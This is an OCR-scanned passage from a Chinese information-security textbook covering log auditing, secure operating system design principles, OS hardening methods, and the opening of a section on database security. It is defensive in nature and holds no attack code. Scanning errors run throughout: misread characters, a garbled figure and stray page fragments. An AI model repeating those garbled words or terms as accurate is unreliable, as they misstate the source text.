日 志 记 录 了 系统 每 天 发 生 的 各 种 各 样 的 事情 ， 可 以 通过 日 志 来 检查 错误 发 生 的 原 
因 ， 或 者 受到 攻击 时 攻击 者 留 下 的 痕迹 。 在 系统 被 入 侵 的 情况 下 ， 日 志 可 以 提供 用 来 判 
定 攻 击 者 何 时 、 何 地 以 及 如 何 入 侵 的 取证 信息 。 日 志 是 计算 机 证 据 的 一 个 重要 来 源 ， 通 
过 日 志 分 析 可 以 得 出 重要 的 线索 和 结论 。 日 志 本 身 就 是 证 据 ， 需 要 保持 日 志 的 完整 性 和 
可 用 性 ， 还 要 妥善 保存 。 日 志 最 好 远程 存放 ， 长 期 保存 ， 定 期 备份 。 记 录 日 志 、 维 护 日 
志 、 日 志 监测 和 审计 等 策略 都 是 完整 安全 策略 的 重要 组 成 部 分 。 

日 志 的 采集 一 般 要 记录 用 户 登录 进入 和 退出 系统 的 记录 ， 跟 踪 每 个 用 户 运 行 的 每 条 
命令 。 多 年 来 ，syslog 已 被 许多 日 志 函 数 采纳 并 移植 到 包括 System V 和 Linux 在 内 的 许 
多 Unix 系统 中 。 它 用 在 许多 保护 措施 中 ,任何 程序 都 能 通过 syslog 记录 事件 。syslog 可 
以 记录 系统 事件 ， 可 以 写 到 一 个 文件 或 设备 ， 或 给 用 户 发 送 一 个 信息 。 它 能 记录 本 地 事 
件 或 通过 网 络 记 录 另 一 个 主机 上 的 事件 。 

syslog 设备 依据 两 个 重要 元 素 : /etc/syslogd (守护 进程 ) 和 /etc/syslog.conf 配置 文件 。 
虽然 日 志 信息 能 写 到 任何 地 方 ， 但 习惯 上 ， 多 数 syslog 信息 被 写 到 /var/adm 或 /var/log A 
录 下 的 信息 文件 中 。 

对 网 络 来 说 ， 把 重要 信息 发 送 到 多 个 专门 的 日 志 主机 上 是 有 意义 的 一 一 安全 增强 机 
制 只 接收 到 来 的 syslog 信息 。 甚 至 在 系统 被 破坏 时 ， 用 户 仍 能 相信 其 他 的 日 志 主机 。 理 
想 情况 下 ， 一 个 日 志 主机 没有 任何 用 户 账号 ， 所 有 不 需要 的 服务 都 被 关闭 。 

在 有 些 情 况 下 ， 可 以 把 日 志 送 到 打印 机 。 一 个 危害 系统 的 网 络 侵入 者 可 能 通过 修改 
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志文 件 来 掩盖 自己 的 踪迹 ， 但 要 破坏 旧式 的 硬 拷 贝 是 很 难 的 。 但 打印 日 志 的 一 个 弱点 
就 是 打印 机 可 能 废 纸 或 故障 ， 所 以 不 要 依靠 打印 机 作为 单独 记录 日 志 的 方式 。 
通常 要 广泛 记录 日 志 。 有 越 多 的 消息 被 日 志 记 录 ， 侵 入 者 消灭 证 据 就 越 困难 。 

syslog 设备 是 一 个 攻击 者 或 侵入 者 的 显著 目标 。 一 个 为 其 他 主机 维护 日 志 的 系统 对 
于 防范 服务 攻击 特别 脆弱 , 攻击 者 可 以 通过 发 送 超过 其 处 理 能 力 的 消息 , 或 发 送 以 “GB” 
计 的 syslog 消息 来 填 满 目标 磁盘 并 破坏 syslogd。 有 些 操作 系统 使 用 安全 保护 设置 的 
syslog daemon。 例 如 ， 人 允许 用 户 以 “安全 模式 ”创建 syslogd 一 一 “-s” 标 志 告 诉 syslogd 
不 接收 任何 来 自 远程 主机 的 日 志 信息 ， 还 允许 用 户 使 用 “allowed peer” 变 元 (“-a” 标 
志 ) 精确 控制 到 来 的 信息 一 一 这 允许 用 户 指 明 可 以 发 送 日 志 的 他 地 址 和 端口 。 

对 计算 机 犯罪 进行 取证 ， 证 据 来 源 之 一 便 是 计算 机 系统 的 各 种 日 志文 件 。 日 志文 件 
记录 着 访问 者 痕迹 ， 通 过 对 日 志文 件 进行 分 析 ， 能 够 发 现 犯罪 者 的 犯罪 线索 。 但 是 这 一 
点 网 络 犯罪 者 也 是 知道 的 ， 所 以 他 们 会 修改 ， 并 且 删 除 日 志文 件 以 用 来 掩盖 他 们 的 犯罪 
行为 ， 所 以 在 记录 日 志 的 同时 ， 提 供 对 日 志 数据 源 的 授权 控制 机 制 ， 还 必须 用 到 日 志文 
件 完 整 性 保护 技术 来 保护 日 志 。 

审计 系统 的 目标 至 少 包 括 : 确定 和 保持 系统 活动 中 每 个 人 的 责任 ; 确认 重建 事件 的 
发 生 ， 评 估 损 失 ， 监 测 系 统 问 题 区 ， 提 供 有 效 的 灾难 恢复 依据 ， 提 供 阻止 不 正当 使 用 系 
统 行为 的 依据 ， 提 供 案 件 侦破 证 据 。 

审计 通过 对 所 关心 的 事件 进行 记录 和 分 析 来 实现 。 因 此 审计 过 程 包括 审计 发 生 器 、 
日 志 记录 器 、 日 志 分 析 器 和 报告 机 制 几 部 分 。 

安全 操作 系统 的 审计 记录 一 般 应 包括 如 下 信息 : 事件 的 日 期 和 时 间 、 代 表 正 在 进行 
事件 的 主体 的 唯一 标识 符 、 事 件 的 类 型 、 事 件 的 成 功 与 失败 等 。 对 于 标识 与 鉴别 事件 ， 
审计 记录 应 该 记录 事件 发 生 的 源 地 点 (如 终端 标识 符 )。 对 于 将 一 个 客体 引入 某 个 用 户 地 
址 空间 的 事件 以 及 删除 客体 的 事件 ， 审 计 记 录 应 该 包括 客体 名 以 及 客体 的 安全 级 。 

审计 日 志 是 存放 审计 结果 的 二 进 制 结构 文件 。 每 次 审计 进程 开启 后 ， 都 会 按照 已 设 
定好 的 路 径 和 命名 规则 产生 一 个 新 的 日 志文 件 。 

另外 系统 审计 员 可 以 打印 存在 于 审计 日 志文 件 中 的 审计 结果 ， 并 且 还 可 以 选择 打印 
自己 所 需要 的 内 容 。 

日 志文 件 其 实 是 纯 文 本 的 文件 ， 每 一 行 就 是 一 个 消息 。 只 要 是 在 操作 系统 下 能 够 处 
理 纯 文本 的 工具 都 能 用 来 查看 日 志文 件 。 日 志文 件 总 是 很 大 的 ， 因 为 从 第 一 次 启动 操作 
系统 开始 ， 消 息 就 都 累积 在 日 志文 件 中 。 日 志文 件 中 每 一 行 表示 一 个 消息 ， 而 且 都 由 4 
个 域 的 固定 格式 组 成 : 

时 间 标 签 (Timestamp )， 表 示 消 息 发 出 的 日 期 和 时 间 。 

主机 名 〈Hostname)， 表 示 生 成 消息 的 计算 机 的 名 字 。 如 果 只 有 一 台 计 算 机 ， 主 机 
名 就 可 能 没有 必要 了 。 但 是 ， 如 果 在 网 络 环境 中 使 用 syslog， 那 么 就 可 能 要 把 不 同 主机 
的 消息 发 送 到 一 台 服 务 器 上 集中 处 理 。 
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生成 消息 的 子 系统 的 名 字 。 
消息 (Message)， 即 消息 的 内 容 。 
不 同 的 系统 可 采用 不 同 的 机 制 记录 日 志 。 日 志 的 记录 可 能 由 操作 系统 完成 ， 也 可 以 
由 应 用 系统 或 其 他 专用 记录 系统 完成 。 但 是 ， 大 部 分 情况 都 可 用 系统 调用 syslog 来 记录 
日 志 ， 也 可 以 用 SNMP 记录 。 
对 日 志 进 行 分 析 的 主要 内 容 有 : 潜在 侵害 分 析 ; 基于 异常 检测 的 轮廓 ; 简单 攻击 探 
测 ; 复杂 攻击 探测 。 日 志 分 析 的 具体 步骤 是 :从 系统 收集 日 志 ; 检查 日 志 ， 指 出 不 正常 
的 活动 ， 不 符合 规范 的 行为 等 ， 并 产生 报警 ， 对 事件 、 趋 势 等 产生 即时 报表 或 定时 报表 。 
由 于 日 志文 件 是 追踪 、 恢 复 的 直接 依据 ， 甚 至 是 司法 依据 ， 因 此 其 自身 的 安全 性 十 
分 重要 。 审 计 日 志 的 安全 主要 是 查阅 和 存储 的 安全 。 审 计 事 件 的 查阅 应 该 受到 严格 的 限 
制 ， 不 能 自 改 日 志 。 审 计 事 件 的 存储 也 有 安全 要 求 ， 主 要 有 : 受 保护 的 审计 踪迹 存储 ; 
审计 数据 的 可 用 性 保证 ;防止 审计 数据 丢失 。 


4.2.5 操作 系统 安全 增强 的 实现 方法 


安全 控制 问题 归根 结 底 是 一 个 权限 控制 问题 。 如 果 一 个 系统 能 够 在 任何 时 候 都 能 保 
证 用 户 的 行为 得 到 合适 的 权限 控制 ， 那 么 可 以 说 这 个 系统 是 安全 的 。 进 一 步 说 ， 如 果 系 
统 能 够 在 任何 时 候 保证 系统 能 够 为 正常 用 户 提供 合适 的 服务 , 则 可 以 说 该 系统 是 可 信 的 。 
简 而 言 之 ， 权 限 控制 的 目标 就 是 保证 系统 中 的 用 户 “ 能 够 做 应 该 做 的 事 ”，“ 不 能 做 不 应 
该 做 的 事 ”。 对 系统 中 的 用 户 而 言 , 需要 有 一 个 合适 的 权限 分 配 机 制 , 还 要 有 一 个 动态 的 
策略 来 保证 这 种 权限 分 配 在 系统 运行 中 不 会 被 破坏 ， 保 证 系统 运行 时 的 变化 不 会 影响 到 
已 有 的 用 户 信息 ， 保 证 每 个 用 户 只 能 使 用 自己 拥有 的 权限 。 
4.25.1 ”安全 操作 系统 的 设计 原则 

1972 年 ，JP.Anderson 等 人 提出 了 引用 监控 机 制 (Reference Monitor Mechanism) 、 
引用 验证 机 制 (Reference Validation Mechanism) 、 安 全 核 (Security Kemel) 和 安全 建 
模 (Security Modeling) 等 重要 概念 ， 并 提出 了 开发 安全 操作 系统 总 的 指导 原则 。 

安全 操作 系统 的 设计 优先 考虑 的 是 隔离 性 、 完 整 性 和 可 验证 性 三 个 基本 原则 ， 而 不 
是 普通 操作 系统 所 考虑 的 灵活 性 、 方 便 性 、 性 能 、 开 发 费用 等 因素 。 一 般 来 说 ， 安 全 操 
作 系 统 的 设计 应 考虑 到 以 下 因素 : 第 一 ， 实 现 通 用 操作 系统 中 的 基本 安全 功能 ， 即 保证 
各 个 过 程 的 相互 隔离 性 ， 每 个 过 程 都 有 其 独立 运行 的 安全 空间 ; 第 二 ， 安 全 性 在 安全 操 
作 系 统 中 的 实现 ， 即 安全 内 核 的 设计 。 

萨 尔 泽 (Saltzer) 和 施 罗 德 (Schroder) 提出 了 下 列 安全 操作 系统 的 设计 原则 : 

O 最 小 特权 : 为 使 无 意 或 恶意 的 攻击 所 造成 的 损失 达到 最 低 限度 ， 每 个 用 户 和 程 
序 必须 按照 “需要 ”原则 ， 尽 可 能 地 使 用 最 小 特权 。 

© 机 制 的 经 济 性 : 保护 系统 的 设计 应 小 型 化 、 简 单 、 明 确 。 保 护 系统 应 该 是 经 过 
完备 测试 或 严格 验证 的 。 
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@ 开放 系统 设计 : 保护 机 制 应 该 是 公开 的 ， 因 为 安全 性 不 依赖 于 保密 。 
@ 完整 的 存 取 控 制 机 制 ， 对 每 个 存 取 访问 系统 必须 进行 检查 。 
© 基于 “允许 ”的 设计 原则 ;应 当 标识 什么 资源 是 应 该 是 可 存 取 的 ， 而 非 标识 什 
么 资源 是 不 可 存 取 的 ， 也 就 意味 着 许可 是 基于 否定 背景 的 ， 即 没有 被 显 式 许可 标识 的 都 
是 不 允许 存 取 的 。 
© 权限 分 离 ; 在 理想 情况 下 对 实体 的 存 取 应 该 受到 多 个 安全 条 件 的 约束 ， 如 用 户 
身份 鉴别 和 密 钥 等 .这 样 使 得 侵入 保护 系统 的 人 将 不 会 轻易 拥有 对 全 部 资源 的 存 取 权限 。 
@ 避免 信息 流 的 潜在 通道 ,信息 流 的 潜在 通道 一 般 是 由 可 共享 实体 的 存在 所 引起 
的 ， 系 统 为 防止 这 种 潜在 通道 应 采取 物理 或 多 和 辑 分 离 的 方法 。 
© 方便 使 用 ， 友 好 的 用 户 接口 。 
42.52 ”安全 操作 系统 的 实现 方法 
操作 系统 安全 的 可 信 性 主要 依赖 于 安全 功能 在 系统 中 实现 的 完整 性 、 文 档 系统 的 清 
晰 性 、 系 统 测试 的 完备 性 和 形式 化 验证 所 达到 的 程度 。 操 作 系统 可 以 看 成 是 由 内 核 程序 
和 应 用 程序 组 成 的 一 个 大 型 软件 ， 其 中 内 核 直接 和 硬件 打交道 ， 应 用 程序 为 用 户 提供 使 
用 命令 和 接口 。 验 证 这 样 一 个 大 型 软件 的 安全 性 是 十 分 困难 的 ， 因 此 要 求 在 设计 中 要 用 
尽量 小 的 操作 系统 部 分 控制 整个 操作 系统 的 安全 性 ， 并 且 使 得 这 一 小 部 分 软件 便于 验证 
或 测试 ， 从 而 可 用 这 一 小 部 分 软件 的 安全 可 信 性 来 保证 整个 操作 系统 的 安全 可 信 性 。 
| 用户 软件 | 相信 入 用 软件 | 
| WK | 
| ee 
图 4-4 ”安全 操作 系统 一 般 结 构 示 意图 


安全 操作 系统 的 一 般 结构 如 图 4-4 所 示 ， 其 中 ， 由 安全 内 核 用 来 控制 整个 操作 系统 
的 安全 操作 。 可 信 应 用 软件 由 两 个 部 分 组 成 ， 即 系统 管理 员 和 操作 员 进 行 安全 管理 所 需 
的 应 用 程序 ， 以 及 运行 具有 特权 操作 的 、 保 障 系统 正常 工作 所 需 的 应 用 程序 。 用 户 软件 
由 可 信 软 件 以 外 的 应 用 程序 组 成 。 操 作 系 统 的 可 信 应 用 软件 和 安全 内 核 组 成 了 系统 的 可 
信和 软件， 它们 是 可 信 计 算 基 的 一 部 分 ， 系 统 必 须 保 护 可 信和 软件 不 被 修改 和 破坏 。 

在 操作 系统 中 实现 更 强 的 安全 机 制 主要 有 两 条 途径 : 开发 具有 相应 安全 特性 的 操作 
系统 和 在 现 有 操作 系统 上 添加 安全 增强 机 制 。 一 般 来 讲 。 开 发 全 新 的 安全 操作 系统 代价 
大 ， 需 要 兼容 目前 主流 操作 系统 以 保证 系统 易 用 性 。 相 比 之 下 ， 在 现 有 主流 操作 系统 深 
加 安全 特性 相对 容易 实现 ， 兼 容 性 也 易 得 到 保证 。 在 现 有 操作 系统 上 实现 安全 增强 是 目 
前 提高 操作 系统 安全 性 普遍 采用 的 方式 ， 一 般 有 三 种 具体 方法 : 

(1) 虚拟 机 法 。 在 现 有 操作 系统 与 硬件 之 间 增 加 一 个 新 的 分 层 作为 安全 内 核 ， 操 作 
系统 几乎 不 变 地 作为 虚拟 机 来 运行 。 安 全 内 核 的 接口 几乎 与 原 有 硬件 编程 接口 等 价 ， 操 
作 系 统 本 身 并 未 意识 到 已 被 安全 内 核 控制 ， 仍 像 在 裸 机 上 一 样 执行 它 自己 的 进程 和 内 存 


Vai 项 


kd 


信息 安全 工程 师 教程 


管理 功能 ， 因 此 它 可 以 不 变 地 支持 现 有 的 应 用 程序 ， 且 能 很 好 地 兼容 原来 操作 系统 的 将 
来 版 本 。 采 用 虚拟 机 法 增强 操作 系统 的 安全 性 时 ， 硬 件 特性 对 虚拟 机 的 实现 非常 关键 ， 
它 要 求 原 系统 的 硬件 和 结构 都 要 支持 虚拟 机 。 

(2) 改进 /增强 法 。 在 现 有 操作 系统 的 基础 上 对 其 内 核 和 应 用 程序 进行 面向 安全 策略 
的 分 析 ， 然 后 加 入 安全 机 制 ， 经 改造 、 开 发 后 的 安全 操作 系统 基本 上 保持 了 原来 操作 系 
统 的 用 户 接口 界面 。 由 于 改进 /增强 法 是 在 现 有 系统 的 基础 上 开发 增强 安全 性 的 ， 受 其 体 
系 结构 和 现 有 应 用 程序 的 限制 ， 所 以 很 难 达 到 很 高 (如 B2 级 以 上 ) 的 安全 级 别 。 但 这 
种 方法 不 破坏 原 系 统 的 体系 结构 ， 开 发 代价 小 ， 且 能 很 好 地 保持 原来 操作 系统 的 用 户 接 
口 和 系统 效率 。 

(3) 仿真 法 。 对 现 有 操作 系统 的 内 核 进 行 面向 安全 策略 的 分 析 和 修改 以 形成 安全 内 
核 ， 然 后 在 安全 内 核 与 原来 操作 系统 用 户 接口 界面 中 间 再 编写 一 层 仿真 程序 。 这 样 做 的 
好 处 在 于 在 建立 安全 内 核 时 ， 可 以 不 必 受 现 有 应 用 程序 的 限制 ， 且 可 以 完全 自由 地 定义 
原来 操作 系统 仿真 程序 与 安全 内 核 之 间 的 接口 。 但 采用 这 种 方法 要 同时 设计 仿真 程序 和 
安全 内 核 ， 还 要 受 顶 层 原来 操作 系统 接口 的 限制 。 另 外 根据 安全 策略 ， 有 些 原来 操作 系 
统 的 接口 功能 不 安全 ， 从 而 不 能 仿真 ， 有 些 接口 功能 尽管 安全 ， 但 仿真 实现 特别 困难 。 
4.2.5.3 ”安全 操作 系统 的 一 般 开发 过 程 

首先 建立 一 个 安全 模型 。 对 一 个 现 有 操作 系统 的 非 安 全 版 本 进行 安全 性 增强 之 前 ， 
要 进行 安全 需求 分 析 。 也 就 是 根据 所 面临 的 风险 、 己 有 的 操作 系统 版 本 ， 明 确 哪些 安全 
功能 是 原 系统 已 具有 的 ， 哪 些 安全 功能 是 要 开发 的 。 只 有 明确 了 安全 需求 ， 才 能 给 出 相 
应 的 安全 策略 。 计 算 机 安全 模型 是 实现 安全 策略 的 机 制 ， 它 描述 了 计算 机 系统 和 用 户 的 
安全 特性 。 建 立 安全 模型 有 利于 正确 地 评价 模型 与 实际 系统 间 的 对 应 关系 ， 帮 助 我 们 尽 
可 能 精确 地 描述 系统 安全 相关 功能 。 另 外 ， 还 要 将 模型 与 系统 进行 对 应 性 分 析 ， 并 考虑 
如 何 将 模型 用 于 系统 开发 之 中 ， 并 且说 明 所 建安 全 模型 与 安全 策略 是 一 致 的 。 

然后 是 安全 机 制 的 设计 与 实现 。 建 立 了 安全 模型 之 后 ， 结 合 系统 的 特点 选择 一 种 实 
现 该 模型 的 方法 。 使 得 开发 后 的 安全 操作 系统 具有 最 佳 安全 /开发 代价 比 。 

最 后 是 安全 操作 系统 的 可 信 度 认证 。 安 全 操作 系统 设计 完成 后 ， 要 进行 反复 的 测试 
和 安全 性 分 析 ， 并 提交 权威 评测 部 门 进行 安全 可 信 度 认证 。 
4.2.5.4 ”操作 系统 近年 来 受到 重视 的 安全 增强 技术 

1. 增强 对 用 户 身 份 的 鉴别 

目前 ， 一 些 主流 的 操作 系统 通过 简单 的 口令 来 确认 用 户 身份 。 这 种 鉴别 是 单 向 的 和 
不 安全 的 。 对 于 一 些 安全 计算 机 ， 在 开机 和 用 户 登 录 方面 加 强 了 鉴别 力度 ， 采 用 了 双 因 
子 鉴 别 ， 包 括 智能 卡 、USB-Key， 甚 至 还 采用 了 指纹 、 虹 膜 等 鉴别 方式 。 

2. 增强 对 访问 的 控制 

传统 的 访问 控制 理论 表现 为 一 种 关口 控制 的 概念 ， 不 让 不 符合 条 件 者 进去 ， 但 是 一 
旦 取得 进入 的 资格 和 权利 ， 在 范围 内 的 活动 行为 就 无 法 监管 了 ， 进 入 后 想 做 什么 就 做 什 
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么 ， 其 原因 是 主体 对 客体 的 访问 和 行为 是 根据 预定 的 授权 和 身份 识别 来 决定 的 。 授 权 一 
旦 确定 ， 不 看 主体 的 表现 ， 也 不 考查 主体 行为 的 可 信 性 ， 直 到 另外 一 次 授权 的 改变 。 对 
重要 信息 的 授权 人 操作 行为 的 忽视 往往 是 信息 流失 事件 多 发 的 根源 ， 即 使 专用 业务 系统 
有 一 定 的 流程 控制 和 系统 审计 措施 ， 对 信息 目标 的 流动 管理 往往 在 授权 之 后 却 没有 通用 
的 控制 方法 。 这 是 由 授权 机 制 本 身 所 限制 的 。 

访问 控制 是 操作 系统 实施 资源 保护 的 重要 措施 ， 其 基本 任务 是 在 对 主体 进行 识别 和 
鉴别 的 基础 上 ， 判 断 主体 是 否 允许 访问 客体 ， 并 以 此 限制 主体 对 客体 的 访问 。 目 前 访问 
控制 相关 研究 主要 集中 在 三 方面 : 访问 控制 策略 ， 策 略 描述 与 验证 ， 策 略 支持 结构 。 

访问 控制 策略 ， 根 据 具体 安全 需求 所 制定 的 对 资源 进行 访问 的 相关 限制 和 约束 。 从 
授权 方式 上 讲 ， 访 问 控制 策略 简单 分 为 两 类 : 自主 式 策略 和 强制 式 策略 。 在 自主 式 策略 
中 ， 资 源 所 属 主体 能 够 对 该 资源 的 访问 进行 授权 ， 决 定 其 他 主体 是 否 可 以 访问 该 资源 。 
自主 式 策略 已 在 流行 操作 系统 中 得 到 广泛 使 用 ， 但 自主 式 策略 资源 管理 权 比较 分 散 ， 信 
息 容 易 泄漏 ， 难 以 抵御 特洛伊 木马 的 攻击 。 在 强制 式 策略 中 ， 资 源 访问 授权 根据 资源 和 
主体 的 相关 属性 确定 ， 或 者 由 特定 主体 〈 一 般 为 安全 管理 员 ) 指定 。 强 制式 策略 对 特 洛 
伊 木马 攻击 有 一 定 的 抵御 作用 ， 即 使 某 用 户 进程 被 特洛伊 木马 非法 控制 ， 也 不 能 随意 扩 
散 机 密 信息 。 

策略 描述 与 验证 ， 把 安全 策略 以 形式 化 方法 描述 和 表示 ， 并 对 正确 性 加 以 验证 。 随 
着 安全 需求 的 多 样 化 发 展 , 操作 系统 需要 支持 不 同 的 , 甚至 是 动态 变化 的 访问 控制 策略 ， 
一 些 不 局 限于 特定 策略 的 形式 化 描述 方法 逐渐 引起 人 们 的 重视 ， 出 现 一 些 相应 的 策略 描 
述 方法 和 策略 描述 语言 。 把 访问 控制 策略 以 形式 化 方式 描述 主要 有 两 方面 作用 : 一 方面 
对 现实 环境 下 的 安全 需求 或 安全 策略 进一步 抽象 ， 便 于 在 操作 系统 中 实现 ; 另 一 方面 便 
于 访问 控制 策略 的 正确 性 验证 。 基 于 角色 的 访问 控制 是 近年 来 影响 最 大 的 不 局 限于 特定 
策略 的 访问 控制 描述 方法 。 它 的 基本 思想 是 在 用 户 与 权限 之 间 引 入 角色 的 概念 ， 利 用 角 
色 来 实现 用 户 和 权限 的 逻辑 隔离 ， 即 用 户 与 角色 相关 联 ， 角 色 与 权限 相关 联 ， 用 户 通过 
成 为 相应 角色 的 成 员 而 获得 相应 权限 ， 并 不 针对 特定 访问 控制 策略 ， 角 色 之 间 ， 角 色 与 
权限 ， 角 色 与 用 户 的 关系 可 以 根据 具体 的 应 用 环境 和 策略 进行 配置 和 指定 。 

策略 支持 结构 ， 即 在 系统 中 如 何 实现 具体 的 访问 控制 策略 。 

随 着 计算 机 系统 的 广泛 应 用 和 安全 需求 的 多 样 化 发 展 ， 研 究 和 开发 不 局 限于 具体 策 
略 的 支持 框架 逐渐 引起 人 们 的 注意 。 从 20 世纪 90 年 代 初 ， 一 些 研究 机 构 和 学 者 就 开始 
安全 策略 灵活 支持 的 研究 ， 提 出 一 些 策略 灵活 支持 的 体系 结构 。 

通用 访问 控制 框架 。 该 框架 主要 思想 是 把 访问 控制 从 逻辑 上 分 为 两 部 分 : 访问 决策 
部 件 和 访问 执行 部 件 的 这 种 访问 控制 机 制 逻 辑 分 离 的 思想 在 开放 系统 安全 框架 的 访问 控 
制 部 分 得 到 体现 。 

美国 国家 安全 局 ， 犹 他 大 学 微 内 核 结构 研究 组 等 开发 的 一 种 安全 体系 结构 ， 目 标 是 
对 多 种 安全 策略 和 安全 策略 的 动态 改变 提供 统一 支持 。 其 基本 思想 是 通过 一 个 或 多 个 独 
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立 安 全 服务 器 负责 安全 策略 的 管理 和 执行 ， 通 过 进程 问 通信 机 制 与 系统 的 其 他 功能 部 件 
相 联系 。 为 了 保证 效率 ， 其 他 功能 部 件 通过 设置 访问 向 量 缓冲 区 缓存 一 些 上 下 文 的 访问 
决策 结果 。 

3. 审计 增强 

审计 是 一 种 通过 事后 追查 增强 系统 安全 性 的 安全 技术 。 它 要 求 对 涉及 系统 安全 的 操 
作 做 完整 记录 ， 并 对 这 些 记录 进行 必要 的 分 析 。 在 安全 操作 系统 中 ， 安 全 审计 的 作用 主 
要 体现 在 根据 审计 信息 追查 执行 事件 的 当事人 , 明确 事故 责任 ; 通过 对 审计 信息 的 分 析 ， 
可 以 发 现 系统 设计 或 配置 管理 存在 的 不 足 ， 有 利于 改进 系统 安全 性 ; 把 审计 功能 与 告警 
功能 结合 起 来 ， 可 以 实现 安全 管理 员 对 系统 状态 的 实时 监控 。 操 作 系统 的 安全 审计 增强 
主要 集中 在 以 下 方面 : 审计 信息 的 结构 化 与 可 视 化 ， 审 计 信息 分 析 的 自动 化 ， 审 计 信息 
的 保护 。 

审计 信息 的 结构 化 与 可 视 化 ， 就 是 把 记录 下 来 的 原始 的 ， 底 层 的 信息 抽象 成 高 层 的 
事件 提供 给 系统 管理 员 。 随 着 操作 系统 的 复杂 化 ， 海 量 的 审计 信息 不 可 能 交 给 用 户 手工 
分 析 ， 需 要 审计 信息 的 自动 化 分 析 或 半自动 化 分 析 以 协助 用 户 发 现 外 界 入 侵 和 违背 系统 
安全 的 操作 。 审 计 信息 的 保护 ， 尤 其 在 系统 遭 到 入 侵 时 ， 如 何在 受 侵害 的 系统 上 保证 审 
计数 据 不 被 非法 删除 和 算 改 是 审计 功能 发 挥 作用 的 基础 ， 目 前 受到 广泛 的 重视 。 这 方面 
的 审计 增强 近来 主要 体现 为 两 个 方向 ， 把 审计 功能 与 系统 其 他 功能 隔离 ， 防 止 系统 中 其 
他 安全 机 制 被 攻破 危害 到 审计 信息 的 完整 性 ， 单 独 设置 审计 管理 员 负 责 审计 就 是 审计 增 
强 的 一 个 具体 实例 ， 通 过 密码 技术 或 分 布 存 储 技术 保证 审计 信息 的 保密 性 和 完整 性 。 

4. 安全 管理 增强 

安全 管理 在 操作 系统 安全 中 占有 非常 重要 的 地 位 。 很 多 安全 事件 的 发 生 都 存在 一 定 
的 管理 根源 ， 这 其 中 既 有 操作 系统 管理 机 制 上 的 因素 ， 也 有 用 户 管理 配置 上 的 因素 。 操 
作 系 统 安全 管理 方面 的 增强 主要 针对 以 下 两 个 方面 :改进 原 有 操作 系统 中 管理 方面 的 缺 
陷 和 开发 自动 化 或 半自动 化 的 辅助 管理 技术 或 工具 。 

5. 多 管理 员 增强 

目前 ， 管 理 员 方面 的 安全 增强 主要 体现 为 两 种 形式 : 通过 多 个 管理 员 共 同 实现 对 系 
统 的 管理 ， 每 个 管理 员 负 责 不 同 的 管理 职责 ， 彼 此 之 间 既 相互 协助 ， 又 相互 制约 ， 通 过 
一 定 的 机 制 限制 管理 员 程 序 的 权限 ， 减 少 因 这 些 特 权 程 序 被 非法 控制 带 来 的 危害 。 

6 自动 化 辅助 管理 

用 户 管理 配置 引起 的 安全 漏洞 对 系统 安全 构成 严重 的 威胁 。 除 用 户 自身 的 原因 外 ， 
操作 系统 安全 机 制 和 管理 机 制 的 复杂 化 也 是 导致 管理 配置 漏洞 的 内 在 因素 之 一 近年 来 ， 
自动 化 或 半自动 化 的 辅助 管理 技术 与 工具 的 开发 受到 相当 的 重视 ， 具 体 体现 在 ， 自动 化 
配置 能 够 提高 安全 系统 对 用 户 错 误 或 琉 忽 的 免疫 力 ， 是 考核 安全 产品 保证 级 别 的 重要 指 
标 之 一 ; 漏洞 扫描 是 发 现 和 消除 管理 配置 漏洞 的 重要 措施 ， 目 前 也 受到 相当 重视 。 漏 油 
扫描 技术 结合 系统 安全 需求 和 攻击 技术 ， 模 拟 攻击 者 检查 系统 的 弱点 ， 分 析 被 检查 系统 
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的 安全 状况 ， 并 提交 系统 的 安全 分 析 报 告 ， 帮 助 用 户 改进 系统 安全 配置 。 此 外 ， 上 面 提 
到 的 审计 信息 自动 化 分 析 也 是 安全 管理 增强 的 一 个 方面 ， 它 可 协助 管理 员 发 现 和 消除 系 
统管 理 方面 存在 的 安全 隐患 。 

除 以 上 提 到 的 安全 增强 技术 外 , 针对 缓冲 区 溢出 的 安全 增强 , 网 络 协议 栈 安全 增强 ， 
系统 完整 性 保护 等 近年 来 也 有 一 定 的 研究 。 


4.3 ”数据 库 系统 的 安全 


4.3.1 数据 库 安全 的 概念 


数据 库 系统 是 高 效 存储 、 管 理 、 使 用 和 维护 数据 的 集约 式 平台 。 从 数据 库 软件 的 分 
类 出 发 ， 数 据 库 安全 可 以 粗略 划分 为 数据 库 管 理 系统 安全 和 数据 库 应 用 系统 安全 两 个 部 
分 。 数 据 库 管 理 系统 安全 对 于 数据 库 应 用 系统 安全 的 实施 具有 决定 、 支 撑 和 限制 性 作用 ， 
数据 库 应 用 系统 安全 对 于 数据 库 管理 系统 安全 的 发 展 具 有 补充 、 促 进 作 用 。 

作为 一 类 专门 的 软件 系统 ， 数 据 库 的 安全 问题 ， 可 以 近似 的 认为 是 用 于 存储 而 非 传 
输 的 数据 的 安全 问题 。 但 是 普通 的 存储 数据 加 密 是 不 足以 解决 数据 库 的 安全 问题 的 。 数 
据 库 系统 的 结构 与 一 般 文件 有 很 大 差异 ， 对 数据 库 系统 的 访问 也 不 同 于 对 一 般 文件 的 访 
问 ， 因 此 数据 库 系统 的 安全 问题 是 不 同 于 一 般 用 于 存储 的 文件 系统 的 安全 。 

关于 数据 库 的 定义 ， 国 内 外 尚 无 统一 的 定义 。 我 国 GB17859-1999《 计 算 机 信息 系 
统 安全 保护 等 级 划分 准则 》 中 的 《中 华人 民 共 和 国 公共 安全 行业 标准 GA/T389-2002》“ 计 
算 机 信息 系统 安全 等 级 保护 数据 库 管 理 系统 技术 要 求 ” 对 数据 库 安 全 的 定义 是 : 数据 库 
安全 就 是 保证 数据 库 信息 的 保密 性 、 完 整 性 、 一 致 性 和 可 用 性 。 保 密 性 是 指 保护 数据 库 
中 的 数据 不 被 破坏 和 删除 ， 一 致 性 指 确保 数据 库 中 的 数据 满足 实体 完整 性 、 参 照 完 整 性 
和 用 户 定义 完整 性 要 求 ， 可 用 性 指 确保 数据 库 中 的 数据 不 因 人 为 的 和 自然 的 原因 对 授权 
用 户 不 可 用 。 

一 般 而 言 ， 数 据 库 安全 涉及 以 下 这 些 问题 : 

1. 物理 数据 库 的 完整 性 

保证 数据 库 系统 中 的 数据 不 受 各 种 自然 或 者 物理 问题 而 破坏 , 如 地 震 、 水灾 、 火 灾 、 
盗窃 、 电 力 问题 或 设备 故障 等 。 

2. 逻辑 数据 库 的 完整 性 

对 数据 库 的 结构 化 特征 提供 保证 ， 确 保 数 据 库 系统 结构 、 数 据 库 模 式 数 据 库 数据 不 
